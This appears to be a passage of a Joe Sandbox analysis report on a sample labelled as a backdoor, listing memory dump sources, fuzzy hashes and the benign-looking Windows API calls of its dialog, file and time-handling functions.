                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: b4c63a3451d1771c4f33b30cfdac51b24b8d593511b9d3cd73b36c5aa48a4258
                                                • Instruction ID: 032e2af76776ca3d1bb24ecfb1b9e196b33ce9147ccd6a801ab1510270577cd6
                                                • Opcode Fuzzy Hash: b4c63a3451d1771c4f33b30cfdac51b24b8d593511b9d3cd73b36c5aa48a4258
                                                • Instruction Fuzzy Hash: AED119B1A053818FDB14CF2AC88475BBBE0BFA9348F04456DE8449B742D738E958CBD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 0d2d11572142686eba42c6c0f00ab2d127c1be7b303a480a457677001dfd203d
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: E8C1A7362051970ADF2D4639893443FBBA16EA27B131A07ADD5B3CB3C6FF28D524D960
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f85e23e0a7e775e1abfe8f72565b1df93127fa14e748a0bfbc9b546d21718474
                                                • Instruction ID: 38f10c333fc836c286a969e857f4c9fbc69aca32c3113bff8a919a47fcfc68e0
                                                • Opcode Fuzzy Hash: f85e23e0a7e775e1abfe8f72565b1df93127fa14e748a0bfbc9b546d21718474
                                                • Instruction Fuzzy Hash: 56E125755083848FC304CF69D8909AABBF4BFCA300F89495EF5D587352D235EA19DBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                                • Instruction ID: f84c4f4af143e64856fba9bda8e4fc9dd7aa3a04649cf87c7112d528550bdb4d
                                                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                                • Instruction Fuzzy Hash: 46916BB02057C59BD724EF69C898BBA73E5BB98300F10092EE597872C2EA7CD745C352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7da2553fa0291bf85017f65d91c00134c6d8b837777fbf3c336a251d84629b4b
                                                • Instruction ID: 75d7bc66c8f38e3c4154a0d9c08369364e6c309a200490f5808bed902420f693
                                                • Opcode Fuzzy Hash: 7da2553fa0291bf85017f65d91c00134c6d8b837777fbf3c336a251d84629b4b
                                                • Instruction Fuzzy Hash: E961577178070D97DE38CA289899BBF23D4EB41700F144A1EE782DB382D69DED42D759
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                                • Instruction ID: 779c6c334630f02381318a3c612f13b260c3d64450d93bf4d28228e77db01483
                                                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                                • Instruction Fuzzy Hash: 4B714F707053C59BDB24DE2AC8CDB7D77E1AB98304F00092DE5868B383DA7CDA858752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                                • Instruction ID: e2d25c112b4b33298d1dd58f935a5d00b817dbb3803c91e329975704a8a91da1
                                                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                                • Instruction Fuzzy Hash: FD516D71600A8CA7DB34A5688859BBF67C9AB53380F280509EB82D7382D71DED41D3B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1aefa0253e78af5805f05565e63c182f6e3d55a531c52eff814271f0f4a60c0
                                                • Instruction ID: 1fd967c4f78587fabacc8c5b400b343790a522a52d7a2eedc7630b24a7f2176c
                                                • Opcode Fuzzy Hash: a1aefa0253e78af5805f05565e63c182f6e3d55a531c52eff814271f0f4a60c0
                                                • Instruction Fuzzy Hash: 6381908121D6D4AEC7165F7C38A42F53FB96F73341B2D80BAC4C686263D53A4A6CD722
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b21ed90600f441d250962a7d0465eaf80c15a081c6a4b0c81c9a173110be56d8
                                                • Instruction ID: f8ea130c46996cba5b85e2a907a7235e018b410bc31ffc121d82cc77a067831d
                                                • Opcode Fuzzy Hash: b21ed90600f441d250962a7d0465eaf80c15a081c6a4b0c81c9a173110be56d8
                                                • Instruction Fuzzy Hash: 0E51EF705093D28FC712EF2491944AEBFF4BEDA314F59489EE4D55B302D224E64ACBA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2df7f18b482246b04effe4b8a547aac38d68ca1ae5bb8d339096a60e688beadb
                                                • Instruction ID: 58955a58163b408b75e8e99efe4c588a8528b14f988430100b50102275967e2e
                                                • Opcode Fuzzy Hash: 2df7f18b482246b04effe4b8a547aac38d68ca1ae5bb8d339096a60e688beadb
                                                • Instruction Fuzzy Hash: 4A514671A083018BC748CF19D49055AF7E1FFC8354F058A2EE889E7741DB34E959CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                • Instruction ID: 1ccd67c15a5e41c2abe0f1572581b6401136571bc74deb663562971b739d4503
                                                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                • Instruction Fuzzy Hash: 2E31F4B16047469FCB14DF29C89526ABBE0FB99310F10492EE4D5C7342C73DEA59CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 020fe20e910f80f791d11416be98be802f39d851a0c017f7a08b23bc7de0732d
                                                • Instruction ID: 60cd8eb7cd551d06f66a3293f8ca5416f1b40d01d779db3bd955e2f55a110d9a
                                                • Opcode Fuzzy Hash: 020fe20e910f80f791d11416be98be802f39d851a0c017f7a08b23bc7de0732d
                                                • Instruction Fuzzy Hash: 0621A772A201754BCB98CF2DDC9087B7765BB86311746C22BFA46CB3D1C539E925CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _swprintf.LIBCMT ref: 007DDABE
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                  • Part of subcall function 007E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00810EE8,00000200,007DD202,00000000,?,00000050,00810EE8), ref: 007E15B3
                                                • _strlen.LIBCMT ref: 007DDADF
                                                • SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
                                                • GetWindowRect.USER32(?,?), ref: 007DDB79
                                                • GetClientRect.USER32(?,?), ref: 007DDB85
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007DDC25
                                                • GetWindowRect.USER32(?,?), ref: 007DDC52
                                                • SetWindowTextW.USER32(?,?), ref: 007DDC95
                                                • GetSystemMetrics.USER32(00000008), ref: 007DDC9D
                                                • GetWindow.USER32(?,00000005), ref: 007DDCA8
                                                • GetWindowRect.USER32(00000000,?), ref: 007DDCD5
                                                • GetWindow.USER32(00000000,00000002), ref: 007DDD47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                • String ID: $%s:$CAPTION$d
                                                • API String ID: 2407758923-2512411981
                                                • Opcode ID: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
                                                • Instruction ID: 1751fb9c79fa884e8555d06ff92a846a22bef799c08e2489b21e8d20d8da6b2c
                                                • Opcode Fuzzy Hash: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
                                                • Instruction Fuzzy Hash: 02816D71208305AFD720DF68CD89A6FBBF9FBC9704F04091EFA8493291D674E9098B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 007FC277
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE2F
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE41
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE53
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE65
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE77
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE89
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE9B
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEAD
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEBF
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBED1
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEE3
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEF5
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBF07
                                                • _free.LIBCMT ref: 007FC26C
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FC28E
                                                • _free.LIBCMT ref: 007FC2A3
                                                • _free.LIBCMT ref: 007FC2AE
                                                • _free.LIBCMT ref: 007FC2D0
                                                • _free.LIBCMT ref: 007FC2E3
                                                • _free.LIBCMT ref: 007FC2F1
                                                • _free.LIBCMT ref: 007FC2FC
                                                • _free.LIBCMT ref: 007FC334
                                                • _free.LIBCMT ref: 007FC33B
                                                • _free.LIBCMT ref: 007FC358
                                                • _free.LIBCMT ref: 007FC370
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
                                                • Instruction ID: ee12a100e99c2a2827d7ee34f8d27bbf4ce11bb9449d0528ebae135a96891120
                                                • Opcode Fuzzy Hash: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
                                                • Instruction Fuzzy Hash: 30315E3250420DDFEB62AF78DA49B7673E9FF00350F148429E649D7751DF39AC409A52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindow.USER32(?,00000005), ref: 007ECD51
                                                • GetClassNameW.USER32(00000000,?,00000800), ref: 007ECD7D
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007ECD99
                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007ECDB0
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007ECDC4
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007ECDED
                                                • DeleteObject.GDI32(00000000), ref: 007ECDF4
                                                • GetWindow.USER32(00000000,00000002), ref: 007ECDFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                • String ID: STATIC
                                                • API String ID: 3820355801-1882779555
                                                • Opcode ID: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
                                                • Instruction ID: b7cd4d254d155403f071642d010337477f12474269508897cc4261bba18d2761
                                                • Opcode Fuzzy Hash: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
                                                • Instruction Fuzzy Hash: 7C11EB366427A1BBE721AB619C0DF9F365CFB99741F004820FB41A1092CA688D1686A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F8EC5
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007F8ED1
                                                • _free.LIBCMT ref: 007F8EDC
                                                • _free.LIBCMT ref: 007F8EE7
                                                • _free.LIBCMT ref: 007F8EF2
                                                • _free.LIBCMT ref: 007F8EFD
                                                • _free.LIBCMT ref: 007F8F08
                                                • _free.LIBCMT ref: 007F8F13
                                                • _free.LIBCMT ref: 007F8F1E
                                                • _free.LIBCMT ref: 007F8F2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
                                                • Instruction ID: 69d5b7e09d585c98669ea95af88eab9b5fa7690dc34f7db99d9f94422f4eabac
                                                • Opcode Fuzzy Hash: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
                                                • Instruction Fuzzy Hash: 5711D27610014DEFCB91EF94C846DFA3BA5FF08350B0180A0BA088B626DA35EA51DB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;%u$x%u$xc%u
                                                • API String ID: 0-2277559157
                                                • Opcode ID: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
                                                • Instruction ID: c0b557894a908425af4c64166102bcd0cb65d276c6c62e86d70efbd74e485fd4
                                                • Opcode Fuzzy Hash: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
                                                • Instruction Fuzzy Hash: F5F12A716043419BDB25DF348899BEE77B96FA0310F08456BF9858B383DA6CD847C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EAD20
                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 007EAD47
                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007EAD60
                                                • SetWindowTextW.USER32(?,?), ref: 007EAD71
                                                • GetDlgItem.USER32(?,00000065), ref: 007EAD7A
                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007EAD8E
                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007EADA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item$TextWindow$Dialog
                                                • String ID: LICENSEDLG
                                                • API String ID: 3214253823-2177901306
                                                • Opcode ID: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
                                                • Instruction ID: 3c4ee947a8734cbf16e5072eec46ea793efd6b52bc16d8c7a280b82ffb0a0eb4
                                                • Opcode Fuzzy Hash: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
                                                • Instruction Fuzzy Hash: 69210532341254FBE2259F72ED4DE7B3B6CFB8EB56F004414F604E25A0CB6AA901D632
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D9448
                                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007D946B
                                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007D948A
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • _swprintf.LIBCMT ref: 007D9526
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • MoveFileW.KERNEL32(?,?), ref: 007D9595
                                                • MoveFileW.KERNEL32(?,?), ref: 007D95D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                • String ID: rtmp%d
                                                • API String ID: 2111052971-3303766350
                                                • Opcode ID: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
                                                • Instruction ID: 9db698906d0a3fb76e1adb2a5922c1225a513ba28202a41040a1d22535e7b7f6
                                                • Opcode Fuzzy Hash: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
                                                • Instruction Fuzzy Hash: 25412171901159F6CF60EB61CC89ADE737CAF15780F0444E6B649E3242EB789B89CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __aulldiv.LIBCMT ref: 007E0A9D
                                                  • Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AC0
                                                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AD2
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007E0AE3
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0AF3
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0B03
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0B3D
                                                • __aullrem.LIBCMT ref: 007E0BCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
